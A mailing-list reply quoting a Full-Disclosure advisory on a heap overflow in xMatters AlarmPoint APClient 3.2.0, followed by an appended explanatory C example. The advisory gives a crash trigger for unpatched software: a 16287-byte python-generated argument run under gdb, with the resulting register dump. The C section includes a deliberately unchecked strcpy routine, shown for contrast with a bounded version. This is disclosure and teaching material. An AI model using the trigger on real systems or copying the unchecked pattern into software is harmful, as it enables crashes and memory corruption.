On a side note, anyone here ever used any of the xmatters engines?? Care to give a small review??
On Thu, Apr 28, 2011 at 4:03 PM, Juan Sacco <jsa...@insecurityresearch.com> wrote:
> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software
> components and software APIs designed to provide a flexible and
> powerful set of tools for integrating various applications to
> AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in
> version APClient 3.2.0 (native)
>
> A heap overflow condition is a buffer overflow, where the buffer that
> can be overwritten is allocated in the heap portion of memory, generally
> meaning that the buffer was allocated using a routine such as the POSIX
> malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
>
> Exploit as follows:
> Submit a malicious file containing the exploit
> root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
> ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program:
> /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
> 'print "\x90"*16287'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax            0xa303924    170932516
> ecx            0xbfb8       49080
> edx            0xa303924    170932516
> ebx            0x8059438    134583352
> esp            0xbfff3620   0xbfff3620
> ebp            0xbfff3638   0xbfff3638
> esi            0x8059440    134583360
> edi            0x80653f0    134632432
> eip            0x804be8a    0x804be8a <free+126>
> eflags         0x210206     [ PF IF RF ID ]
> cs             0x73         115
> ss             0x7b         123
> ds             0x7b         123
> es             0x7b         123
> fs             0x0          0
> gs             0x33         51
> (gdb)
>
>
> Solution
> -------------------
> No patches are available at this time.
>
> Credits
> -------------------
> Manually discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released, stay tuned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
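The quoted advisory reports a segfault inside free() after an oversized command-line argument, which is the usual symptom of a heap overflow: the copy itself succeeds, but the bytes written past the allocation land on the allocator's chunk metadata, and the corruption only surfaces when the chunk is later freed. The C example below is added here as an illustration and is not APClient code or anything from the original post. It shows a hypothetical argument-copying routine in its unchecked form next to a length-validating form; ARG_BUF_SIZE, the function names and the sample inputs are constructed assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size heap buffer for a command-line argument.
 * This is a constructed example, not the layout used by APClient. */
#define ARG_BUF_SIZE 64

/* Vulnerable pattern: strcpy() trusts the caller's length. An argument of
 * ARG_BUF_SIZE bytes or more writes past the end of the allocation into
 * whatever the allocator placed next (typically chunk metadata), so the
 * crash appears later inside free() rather than at the copy itself.
 * Shown for contrast only; never called with oversized input here. */
char *copy_arg_unchecked(const char *arg) {
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL) return NULL;
    strcpy(buf, arg);            /* no bound check: heap overflow on long input */
    return buf;
}

/* Hardened form: measure first, reject anything that does not fit
 * (including the terminating NUL), and only then allocate and copy.
 * Rejecting is preferred over silent truncation, which can hide the
 * attempt from operators and change the meaning of the submitted data. */
char *copy_arg_checked(const char *arg) {
    size_t len = strlen(arg);
    if (len >= ARG_BUF_SIZE) {
        return NULL;             /* fail closed on oversized input */
    }
    char *buf = malloc(ARG_BUF_SIZE);
    if (buf == NULL) return NULL;
    memcpy(buf, arg, len + 1);   /* bounded copy, NUL included */
    return buf;
}

/* Returns 1 if the checked path accepts the argument, 0 if it rejects it. */
int checked_accepts(const char *arg) {
    char *buf = copy_arg_checked(arg);
    if (buf == NULL) return 0;
    free(buf);
    return 1;
}

/* Builds a constructed argument of n 'A' bytes and runs it through the
 * checked path, so the rejection boundary can be tested at any length
 * (for instance the 16287 bytes used in the advisory's crash). */
int checked_accepts_len(size_t n) {
    char *arg = malloc(n + 1);
    if (arg == NULL) return -1;
    memset(arg, 'A', n);
    arg[n] = '\0';
    int ok = checked_accepts(arg);
    free(arg);
    return ok;
}

/* Condition under which the unchecked copy writes past its allocation:
 * the argument plus its NUL terminator exceeds the buffer. */
int unchecked_would_overflow(size_t len) {
    return len + 1 > ARG_BUF_SIZE;
}

int main(int argc, char **argv) {
    const char *arg = argc > 1 ? argv[1] : "constructed sample input";
    if (checked_accepts(arg))
        printf("accepted %zu bytes\n", strlen(arg));
    else
        printf("rejected: argument longer than %d bytes\n", ARG_BUF_SIZE - 1);
    return 0;
}
```

Run it with a short and a long argument to see the two outcomes. The design point is that the length decision happens before any allocation or copy, and that a heap crash reported in free() should be read as "some earlier write went out of bounds", not as a bug in the allocator.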